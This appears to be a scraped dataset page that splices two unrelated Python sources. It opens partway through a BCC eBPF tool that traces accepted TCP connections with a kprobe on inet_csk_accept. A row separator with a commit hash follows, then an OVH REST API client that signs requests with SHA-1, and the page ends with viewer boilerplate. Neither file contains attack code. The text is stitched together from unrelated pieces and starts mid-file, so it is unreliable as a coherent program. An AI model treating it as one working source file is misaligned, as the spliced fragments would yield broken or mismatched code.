help="trace this PID only")
parser.add_argument("-P", "--port",
help="comma-separated list of local ports to trace")
parser.add_argument("--cgroupmap",
help="trace cgroups in this BPF map only")
parser.add_argument("--mntnsmap",
help="trace mount namespaces in this BPF map only")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
// separate data structs for ipv4 and ipv6
struct ipv4_data_t {
u64 ts_us;
u32 pid;
u32 saddr;
u32 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv4_events);
struct ipv6_data_t {
u64 ts_us;
u32 pid;
unsigned __int128 saddr;
unsigned __int128 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv6_events);
"""
#
# The following code uses kprobes to instrument inet_csk_accept().
# On Linux 4.16 and later, we could use sock:inet_sock_set_state
# tracepoint for efficiency, but it may output wrong PIDs. This is
# because sock:inet_sock_set_state may run outside of process context.
# Hence, we stick to kprobes until we find a proper solution.
#
bpf_text_kprobe = """
int kretprobe__inet_csk_accept(struct pt_regs *ctx)
{
if (container_should_be_filtered()) {
return 0;
}
struct sock *newsk = (struct sock *)PT_REGS_RC(ctx);
u32 pid = bpf_get_current_pid_tgid() >> 32;
##FILTER_PID##
if (newsk == NULL)
return 0;
// check this is TCP
u8 protocol = 0;
// workaround for reading the sk_protocol bitfield:
// Following comments add by Joe Yin:
// Unfortunately,it can not work since Linux 4.10,
// because the sk_wmem_queued is not following the bitfield of sk_protocol.
// And the following member is sk_gso_max_segs.
// So, we can use this:
// bpf_probe_read_kernel(&protocol, 1, (void *)((u64)&newsk->sk_gso_max_segs) - 3);
// In order to diff the pre-4.10 and 4.10+ ,introduce the variables gso_max_segs_offset,sk_lingertime,
// sk_lingertime is closed to the gso_max_segs_offset,and
// the offset between the two members is 4
int gso_max_segs_offset = offsetof(struct sock, sk_gso_max_segs);
int sk_lingertime_offset = offsetof(struct sock, sk_lingertime);
if (sk_lingertime_offset - gso_max_segs_offset == 4)
// 4.10+ with little endian
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 3);
else
// pre-4.10 with little endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 3);
#elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__
// 4.10+ with big endian
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 1);
else
// pre-4.10 with big endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 1);
#else
# error "Fix your compiler's __BYTE_ORDER__?!"
#endif
if (protocol != IPPROTO_TCP)
return 0;
// pull in details
u16 family = 0, lport = 0, dport;
family = newsk->__sk_common.skc_family;
lport = newsk->__sk_common.skc_num;
dport = newsk->__sk_common.skc_dport;
dport = ntohs(dport);
##FILTER_PORT##
if (family == AF_INET) {
struct ipv4_data_t data4 = {.pid = pid, .ip = 4};
data4.ts_us = bpf_ktime_get_ns() / 1000;
data4.saddr = newsk->__sk_common.skc_rcv_saddr;
data4.daddr = newsk->__sk_common.skc_daddr;
data4.lport = lport;
data4.dport = dport;
bpf_get_current_comm(&data4.task, sizeof(data4.task));
ipv4_events.perf_submit(ctx, &data4, sizeof(data4));
} else if (family == AF_INET6) {
struct ipv6_data_t data6 = {.pid = pid, .ip = 6};
data6.ts_us = bpf_ktime_get_ns() / 1000;
bpf_probe_read_kernel(&data6.saddr, sizeof(data6.saddr),
&newsk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read_kernel(&data6.daddr, sizeof(data6.daddr),
&newsk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
data6.lport = lport;
data6.dport = dport;
bpf_get_current_comm(&data6.task, sizeof(data6.task));
ipv6_events.perf_submit(ctx, &data6, sizeof(data6));
}
// else drop
return 0;
}
"""
bpf_text += bpf_text_kprobe
# code substitutions
if args.pid:
bpf_text = bpf_text.replace('##FILTER_PID##',
'if (pid != %s) { return 0; }' % args.pid)
else:
bpf_text = bpf_text.replace('##FILTER_PID##', '')
if args.port:
lports = [int(lport) for lport in args.port.split(',')]
lports_if = ' && '.join(['lport != %d' % lport for lport in lports])
bpf_text = bpf_text.replace('##FILTER_PORT##',
'if (%s) { return 0; }' % lports_if)
bpf_text = filter_by_containers(args) + bpf_text
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
bpf_text = bpf_text.replace('##FILTER_PORT##', '')
# process event
def print_ipv4_event(cpu, data, size):
event = b["ipv4_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET, pack("I", event.daddr)).encode(),
event.dport,
inet_ntop(AF_INET, pack("I", event.saddr)).encode(),
event.lport))
def print_ipv6_event(cpu, data, size):
event = b["ipv6_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET6, event.daddr).encode(),
event.dport,
inet_ntop(AF_INET6, event.saddr).encode(),
event.lport))
# initialize BPF
b = BPF(text=bpf_text)
# header
if args.time:
print("%-9s" % ("TIME"), end="")
if args.timestamp:
print("%-9s" % ("TIME(s)"), end="")
print("%-7s %-12s %-2s %-16s %-5s %-16s %-5s" % ("PID", "COMM", "IP", "RADDR",
"RPORT", "LADDR", "LPORT"))
start_ts = 0
# read events
b["ipv4_events"].open_perf_buffer(print_ipv4_event)
b["ipv6_events"].open_perf_buffer(print_ipv6_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
py
|
1a5f1d57e57264a5414884ffc30e494cb7f83cda
|
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2013-2017, OVH SAS.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of OVH SAS nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY OVH SAS AND CONTRIBUTORS ````AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL OVH SAS AND CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module provides a simple python wrapper over the OVH REST API.
It handles requesting credential, signing queries...
- To get your API keys: https://eu.api.ovh.com/createApp/
- To get started with API: https://api.ovh.com/g934.first_step_with_api
"""
import hashlib
import urllib
import keyword
import time
import json
try:
from urllib import urlencode
except ImportError: # pragma: no cover
# Python 3
from urllib.parse import urlencode
from .vendor.requests import request, Session
from .vendor.requests.packages import urllib3
from .vendor.requests.exceptions import RequestException
# Disable pyopenssl. It breaks SSL connection pool when SSL connection is
# closed unexpetedly by the server. And we don't need SNI anyway.
try:
from .vendor.requests.packages.urllib3.contrib import pyopenssl
pyopenssl.extract_from_urllib3()
except ImportError:
pass
# Disable SNI related Warning. The API does not rely on it
urllib3.disable_warnings(urllib3.exceptions.SNIMissingWarning)
urllib3.disable_warnings(urllib3.exceptions.SecurityWarning)
from .config import config
from .consumer_key import ConsumerKeyRequest
from .exceptions import (
APIError, NetworkError, InvalidResponse, InvalidRegion, InvalidKey,
ResourceNotFoundError, BadParametersError, ResourceConflictError, HTTPError,
NotGrantedCall, NotCredential, Forbidden, InvalidCredential,
)
#: Mapping between OVH API region names and corresponding endpoints
ENDPOINTS = {
'ovh-eu': 'https://eu.api.ovh.com/1.0',
'ovh-ca': 'https://ca.api.ovh.com/1.0',
'kimsufi-eu': 'https://eu.api.kimsufi.com/1.0',
'kimsufi-ca': 'https://ca.api.kimsufi.com/1.0',
'soyoustart-eu': 'https://eu.api.soyoustart.com/1.0',
'soyoustart-ca': 'https://ca.api.soyoustart.com/1.0',
}
#: Default timeout for each request. 180 seconds connect, 180 seconds read.
TIMEOUT = 180
class Client(object):
"""
Low level OVH Client. It abstracts all the authentication and request
signing logic along with some nice tools helping with key generation.
All low level request logic including signing and error handling takes place
in :py:func:`Client.call` function. Convenient wrappers
:py:func:`Client.get` :py:func:`Client.post`, :py:func:`Client.put`,
:py:func:`Client.delete` should be used instead. :py:func:`Client.post`,
:py:func:`Client.put` both accept arbitrary list of keyword arguments
mapped to ``data`` param of :py:func:`Client.call`.
Example usage:
.. code:: python
from ovh import Client, APIError
REGION = 'ovh-eu'
APP_KEY="<application key>"
APP_SECRET="<application secret key>"
CONSUMER_KEY="<consumer key>"
client = Client(REGION, APP_KEY, APP_SECRET, CONSUMER_KEY)
try:
print client.get('/me')
except APIError as e:
print "Ooops, failed to get my info:", e.msg
"""
def __init__(self, endpoint=None, application_key=None,
application_secret=None, consumer_key=None, timeout=TIMEOUT,
config_file=None):
"""
Creates a new Client. No credential check is done at this point.
The ``application_key`` identifies your application while
``application_secret`` authenticates it. On the other hand, the
``consumer_key`` uniquely identifies your application's end user without
requiring his personal password.
If any of ``endpoint``, ``application_key``, ``application_secret``
or ``consumer_key`` is not provided, this client will attempt to locate
from them from environment, ~/.ovh.cfg or /etc/ovh.cfg.
See :py:mod:`ovh.config` for more informations on supported
configuration mechanisms.
``timeout`` can either be a float or a tuple. If it is a float it
sets the same timeout for both connection and read. If it is a tuple
connection and read timeout will be set independently. To use the
latter approach you need at least requests v2.4.0. Default value is
180 seconds for connection and 180 seconds for read.
:param str endpoint: API endpoint to use. Valid values in ``ENDPOINTS``
:param str application_key: Application key as provided by OVH
:param str application_secret: Application secret key as provided by OVH
:param str consumer_key: uniquely identifies
:param tuple timeout: Connection and read timeout for each request
:param float timeout: Same timeout for both connection and read
:raises InvalidRegion: if ``endpoint`` can't be found in ``ENDPOINTS``.
"""
# Load a custom config file if requested
if config_file is not None:
config.read(config_file)
# load endpoint
if endpoint is None:
endpoint = config.get('default', 'endpoint')
try:
self._endpoint = ENDPOINTS[endpoint]
except KeyError:
raise InvalidRegion("Unknow endpoint %s. Valid endpoints: %s",
endpoint, ENDPOINTS.keys())
# load keys
if application_key is None:
application_key = config.get(endpoint, 'application_key')
self._application_key = application_key
if application_secret is None:
application_secret = config.get(endpoint, 'application_secret')
self._application_secret = application_secret
if consumer_key is None:
consumer_key = config.get(endpoint, 'consumer_key')
self._consumer_key = consumer_key
# lazy load time delta
self._time_delta = None
# use a requests session to reuse HTTPS connections between requests
self._session = Session()
# Override default timeout
self._timeout = timeout
## high level API
@property
def time_delta(self):
"""
Request signatures are valid only for a short amount of time to mitigate
risk of attack replay scenarii which requires to use a common time
reference. This function queries endpoint's time and computes the delta.
This entrypoint does not require authentication.
This method is *lazy*. It will only load it once even though it is used
for each request.
.. note:: You should not need to use this property directly
:returns: time distance between local and server time in seconds.
:rtype: int
"""
if self._time_delta is None:
server_time = self.get('/auth/time', _need_auth=False)
self._time_delta = server_time - int(time.time())
return self._time_delta
def new_consumer_key_request(self):
"""
Create a new consumer key request. This is the recommended way to create
a new consumer key request.
Full example:
>>> import ovh
>>> client = ovh.Client("ovh-eu")
>>> ck = client.new_consumer_key_request()
>>> ck.add_rules(ovh.API_READ_ONLY, "/me")
>>> ck.add_recursive_rules(ovh.API_READ_WRITE, "/sms")
>>> ck.request()
{
'state': 'pendingValidation',
'consumerKey': 'TnpZAd5pYNqxk4RhlPiSRfJ4WrkmII2i',
'validationUrl': 'https://eu.api.ovh.com/auth/?credentialToken=now2OOAVO4Wp6t7bemyN9DMWIobhGjFNZSHmixtVJM4S7mzjkN2L5VBfG96Iy1i0'
}
"""
return ConsumerKeyRequest(self)
def request_consumerkey(self, access_rules, redirect_url=None):
"""
Create a new "consumer key" identifying this application's end user. API
will return a ``consumerKey`` and a ``validationUrl``. The end user must
visit the ``validationUrl``, authenticate and validate the requested
``access_rules`` to link his account to the ``consumerKey``. Once this
is done, he may optionaly be redirected to ``redirect_url`` and the
application can start using the ``consumerKey``.
The new ``consumerKey`` is automatically loaded into
``self._consumer_key`` and is ready to used as soon as validated.
As signing requires a valid ``consumerKey``, the method does not require
authentication, only a valid ``applicationKey``
``access_rules`` is a list of the form:
.. code:: python
# Grant full, unrestricted API access
access_rules = [
{'method': 'GET', 'path': '/*'},
{'method': 'POST', 'path': '/*'},
{'method': 'PUT', 'path': '/*'},
{'method': 'DELETE', 'path': '/*'}
]
To request a new consumer key, you may use a code like:
.. code:: python
# Request RO, /me API access
access_rules = [
{'method': 'GET', 'path': '/me'},
]
# Request token
validation = client.request_consumerkey(access_rules)
print "Please visit", validation['validationUrl'], "to authenticate"
raw_input("and press Enter to continue...")
# Print nice welcome message
print "Welcome", client.get('/me')['firstname']
:param list access_rules: Mapping specifying requested privileges.
:param str redirect_url: Where to redirect end user upon validation.
:raises APIError: When ``self.call`` fails.
:returns: dict with ``consumerKey`` and ``validationUrl`` keys
:rtype: dict
"""
res = self.post('/auth/credential', _need_auth=False,
accessRules=access_rules, redirection=redirect_url)
self._consumer_key = res['consumerKey']
return res
## API shortcuts
def _canonicalize_kwargs(self, kwargs):
"""
If an API needs an argument colliding with a Python reserved keyword, it
can be prefixed with an underscore. For example, ``from`` argument of
``POST /email/domain/{domain}/redirection`` may be replaced by ``_from``
:param dict kwargs: input kwargs
:return dict: filtered kawrgs
"""
arguments = {}
for k, v in kwargs.items():
if k[0] == '_' and k[1:] in keyword.kwlist:
k = k[1:]
arguments[k] = v
return arguments
def _prepare_query_string(self, kwargs):
"""
Boolean needs to be send as lowercase 'false' or 'true' in querystring.
This function prepares arguments for querystring and encodes them.
:param dict kwargs: input kwargs
:return string: prepared querystring
"""
arguments = {}
for k, v in kwargs.items():
if isinstance(v, bool):
v = str(v).lower()
arguments[k] = v
return urlencode(arguments)
def get(self, _target, _need_auth=True, **kwargs):
"""
'GET' :py:func:`Client.call` wrapper.
Query string parameters can be set either directly in ``_target`` or as
keywork arguments. If an argument collides with a Python reserved
keyword, prefix it with a '_'. For instance, ``from`` becomes ``_from``.
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
if kwargs:
kwargs = self._canonicalize_kwargs(kwargs)
query_string = self._prepare_query_string(kwargs)
if '?' in _target:
_target = '%s&%s' % (_target, query_string)
else:
_target = '%s?%s' % (_target, query_string)
return self.call('GET', _target, None, _need_auth)
def put(self, _target, _need_auth=True, **kwargs):
"""
'PUT' :py:func:`Client.call` wrapper
Body parameters can be set either directly in ``_target`` or as keywork
arguments. If an argument collides with a Python reserved keyword,
prefix it with a '_'. For instance, ``from`` becomes ``_from``.
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
kwargs = self._canonicalize_kwargs(kwargs)
return self.call('PUT', _target, kwargs, _need_auth)
def post(self, _target, _need_auth=True, **kwargs):
"""
'POST' :py:func:`Client.call` wrapper
Body parameters can be set either directly in ``_target`` or as keywork
arguments. If an argument collides with a Python reserved keyword,
prefix it with a '_'. For instance, ``from`` becomes ``_from``.
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
kwargs = self._canonicalize_kwargs(kwargs)
return self.call('POST', _target, kwargs, _need_auth)
def delete(self, _target, _need_auth=True):
"""
'DELETE' :py:func:`Client.call` wrapper
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
return self.call('DELETE', _target, None, _need_auth)
## low level helpers
def call(self, method, path, data=None, need_auth=True):
"""
Low level call helper. If ``consumer_key`` is not ``None``, inject
authentication headers and sign the request.
Request signature is a sha1 hash on following fields, joined by '+'
- application_secret
- consumer_key
- METHOD
- full request url
- body
- server current time (takes time delta into account)
:param str method: HTTP verb. Usually one of GET, POST, PUT, DELETE
:param str path: api entrypoint to call, relative to endpoint base path
:param data: any json serializable data to send as request's body
:param boolean need_auth: if False, bypass signature
:raises HTTPError: when underlying request failed for network reason
:raises InvalidResponse: when API response could not be decoded
"""
# attempt request
try:
result = self.raw_call(method=method, path=path, data=data, need_auth=need_auth)
except RequestException as error:
raise HTTPError("Low HTTP request failed error", error)
status = result.status_code
# attempt to decode and return the response
try:
json_result = result.json()
except ValueError as error:
raise InvalidResponse("Failed to decode API response", error)
# error check
if status >= 100 and status < 300:
return json_result
elif status == 403 and json_result.get('errorCode') == 'NOT_GRANTED_CALL':
raise NotGrantedCall(json_result.get('message'),
response=result)
elif status == 403 and json_result.get('errorCode') == 'NOT_CREDENTIAL':
raise NotCredential(json_result.get('message'),
response=result)
elif status == 403 and json_result.get('errorCode') == 'INVALID_KEY':
raise InvalidKey(json_result.get('message'), response=result)
elif status == 403 and json_result.get('errorCode') == 'INVALID_CREDENTIAL':
raise InvalidCredential(json_result.get('message'),
response=result)
elif status == 403 and json_result.get('errorCode') == 'FORBIDDEN':
raise Forbidden(json_result.get('message'), response=result)
elif status == 404:
raise ResourceNotFoundError(json_result.get('message'),
response=result)
elif status == 400:
raise BadParametersError(json_result.get('message'),
response=result)
elif status == 409:
raise ResourceConflictError(json_result.get('message'),
response=result)
elif status == 0:
raise NetworkError()
else:
raise APIError(json_result.get('message'), response=result)
def raw_call(self, method, path, data=None, need_auth=True):
"""
Lowest level call helper. If ``consumer_key`` is not ``None``, inject
authentication headers and sign the request.
Will return a vendored ``requests.Response`` object or let any
``requests`` exception pass through.
Request signature is a sha1 hash on following fields, joined by '+'
- application_secret
- consumer_key
- METHOD
- full request url
- body
- server current time (takes time delta into account)
:param str method: HTTP verb. Usually one of GET, POST, PUT, DELETE
:param str path: api entrypoint to call, relative to endpoint base path
:param data: any json serializable data to send as request's body
:param boolean need_auth: if False, bypass signature
"""
body = ''
target = self._endpoint + path
headers = {
'X-Ovh-Application': self._application_key
}
# include payload
if data is not None:
headers['Content-type'] = 'application/json'
body = json.dumps(data)
# sign request. Never sign 'time' or will recuse infinitely
if need_auth:
if not self._application_secret:
raise InvalidKey("Invalid ApplicationSecret '%s'" %
self._application_secret)
if not self._consumer_key:
raise InvalidKey("Invalid ConsumerKey '%s'" %
self._consumer_key)
now = str(int(time.time()) + self.time_delta)
signature = hashlib.sha1()
signature.update("+".join([
self._application_secret, self._consumer_key,
method.upper(), target,
body,
now
]).encode('utf-8'))
headers['X-Ovh-Consumer'] = self._consumer_key
headers['X-Ovh-Timestamp'] = now
headers['X-Ovh-Signature'] = "$1$" + signature.hexdigest()
return self._session.request(method, target, headers=headers,
data=body, timeout=self._timeout)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.